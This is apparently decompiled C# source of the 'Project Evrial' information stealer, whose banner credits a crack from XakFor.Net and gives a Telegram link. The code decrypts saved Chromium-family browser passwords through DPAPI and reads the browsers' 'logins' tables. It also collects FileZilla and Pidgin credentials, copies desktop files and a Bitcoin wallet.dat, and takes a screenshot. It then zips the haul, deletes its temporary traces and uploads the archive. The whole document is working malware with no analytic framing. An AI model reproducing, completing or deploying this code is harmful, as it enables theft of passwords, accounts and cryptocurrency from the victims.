// Token: 0x06000019 RID: 25 RVA: 0x0000266C File Offset: 0x0000086C
public static byte[] DecryptChromium(byte[] cipherTextBytes, byte[] entropyBytes = null)
{
Chromium.DataBlob dataBlob = default(Chromium.DataBlob);
Chromium.DataBlob dataBlob2 = default(Chromium.DataBlob);
Chromium.DataBlob dataBlob3 = default(Chromium.DataBlob);
Chromium.CryptprotectPromptstruct cryptprotectPromptstruct = new Chromium.CryptprotectPromptstruct
{
cbSize = Marshal.SizeOf(typeof(Chromium.CryptprotectPromptstruct)),
dwPromptFlags = 0,
hwndApp = IntPtr.Zero,
szPrompt = null
};
string empty = string.Empty;
try
{
try
{
if (cipherTextBytes == null)
{
cipherTextBytes = new byte[0];
}
dataBlob2.pbData = Marshal.AllocHGlobal(cipherTextBytes.Length);
dataBlob2.cbData = cipherTextBytes.Length;
Marshal.Copy(cipherTextBytes, 0, dataBlob2.pbData, cipherTextBytes.Length);
}
catch (Exception)
{
}
try
{
if (entropyBytes == null)
{
entropyBytes = new byte[0];
}
dataBlob3.pbData = Marshal.AllocHGlobal(entropyBytes.Length);
dataBlob3.cbData = entropyBytes.Length;
Marshal.Copy(entropyBytes, 0, dataBlob3.pbData, entropyBytes.Length);
}
catch (Exception)
{
}
Chromium.CryptUnprotectData(ref dataBlob2, ref empty, ref dataBlob3, IntPtr.Zero, ref cryptprotectPromptstruct, 1, ref dataBlob);
byte[] array = new byte[dataBlob.cbData];
Marshal.Copy(dataBlob.pbData, array, 0, dataBlob.cbData);
return(array);
}
catch (Exception)
{
}
finally
{
if (dataBlob.pbData != IntPtr.Zero)
{
Marshal.FreeHGlobal(dataBlob.pbData);
}
if (dataBlob2.pbData != IntPtr.Zero)
{
Marshal.FreeHGlobal(dataBlob2.pbData);
}
if (dataBlob3.pbData != IntPtr.Zero)
{
Marshal.FreeHGlobal(dataBlob3.pbData);
}
}
return(new byte[0]);
}
// Token: 0x06000031 RID: 49 RVA: 0x00002DA8 File Offset: 0x00000FA8
public static void SendFile()
{
string randomString = Helper.GetRandomString();
string text = Path.GetTempPath() + randomString;
Directory.CreateDirectory(text);
using (StreamWriter streamWriter = new StreamWriter(text + "\\passwords.log"))
{
streamWriter.WriteLine(string.Concat(new string[]
{
"[————————————————————————————————————————————————————————]\r\n[==================== Project Evrial ====================]\r\n[========================================================]\r\n[=================== Crack XakFor.Net ===================]\r\n[========================================================]\r\n[======================= Telegram: ======================]\r\n[===== https://t.me/joinchat/Dk-XFgiWpYO-5nPzsNeCoQ =====]\r\n[————————————————————————————————————————————————————————]\r\n",
string.Format("Date: {0}\r\n", DateTime.Now),
string.Format("Windows Username: {0}\r\n", Environment.UserName),
string.Format("HWID: {0}\r\n", RawSettings.HWID),
string.Format("System: {0}\r\n", Passwords.GetWindowsVersion())
}));
try
{
foreach (PassData value in Chromium.Initialise())
{
streamWriter.WriteLine(value);
}
}
catch
{
}
try
{
foreach (PassData value2 in Messenger.Pidgin.Initialise())
{
streamWriter.WriteLine(value2);
}
}
catch
{
}
}
try
{
Passwords.DesktopCopy(text);
}
catch (Exception ex)
{
Console.WriteLine(ex.ToString());
}
try
{
Passwords.GetJpegScreen(text + "\\desktop.jpg");
}
catch (Exception ex2)
{
Console.WriteLine(ex2.ToString());
}
try
{
Chromium.ChromiumInitialise(text + "\\");
}
catch (Exception ex3)
{
Console.WriteLine(ex3.ToString());
}
try
{
FilezillaFTP.FileZilla.Initialise(text + "\\");
}
catch (Exception ex4)
{
Console.WriteLine(ex4.ToString());
}
try
{
string text2 = Wallet.BitcoinStealer();
if (text2 != "" && File.Exists(text2))
{
File.Copy(text2, text + "\\wallet.dat");
}
}
catch (Exception ex5)
{
Console.WriteLine(ex5.ToString());
}
try
{
Passwords.Zip(text, Path.GetTempPath() + "\\" + randomString + ".zip");
}
catch (Exception ex6)
{
Console.WriteLine(ex6.ToString());
}
try
{
Passwords.RemoveTempFiles(text);
}
catch (Exception ex7)
{
Console.WriteLine(ex7.ToString());
}
try
{
Network.UploadFile(Path.GetTempPath() + "\\" + randomString + ".zip");
}
catch (Exception ex8)
{
Console.WriteLine(ex8.ToString());
}
}
// Token: 0x0600001A RID: 26 RVA: 0x00002820 File Offset: 0x00000A20
private static List <PassData> Get(string basePath)
{
if (!File.Exists(basePath))
{
return(null);
}
string program = "";
if (basePath.Contains("Chrome"))
{
program = "Google Chrome";
}
if (basePath.Contains("Yandex"))
{
program = "Yandex Browser";
}
if (basePath.Contains("Orbitum"))
{
program = "Orbitum Browser";
}
if (basePath.Contains("Opera"))
{
program = "Opera Browser";
}
if (basePath.Contains("Amigo"))
{
program = "Amigo Browser";
}
if (basePath.Contains("Torch"))
{
program = "Torch Browser";
}
if (basePath.Contains("Comodo"))
{
program = "Comodo Browser";
}
List <PassData> result;
try
{
string text = Path.GetTempPath() + "/" + Helper.GetRandomString() + ".fv";
if (File.Exists(text))
{
File.Delete(text);
}
File.Copy(basePath, text, true);
Sqlite sqlite = new Sqlite(text);
List <PassData> list = new List <PassData>();
sqlite.ReadTable("logins");
for (int i = 0; i < sqlite.GetRowCount(); i++)
{
try
{
string text2 = string.Empty;
try
{
byte[] bytes = Chromium.DecryptChromium(Encoding.Default.GetBytes(sqlite.GetValue(i, 5)), null);
text2 = Encoding.UTF8.GetString(bytes);
}
catch (Exception)
{
}
if (text2 != "")
{
list.Add(new PassData
{
Url = sqlite.GetValue(i, 1).Replace("https://", "").Replace("http://", ""),
Login = sqlite.GetValue(i, 3),
Password = text2,
Program = program
});
}
}
catch (Exception ex)
{
Console.WriteLine(ex.ToString());
}
}
File.Delete(text);
result = list;
}
catch (Exception ex2)
{
Console.WriteLine(ex2.ToString());
result = null;
}
return(result);
}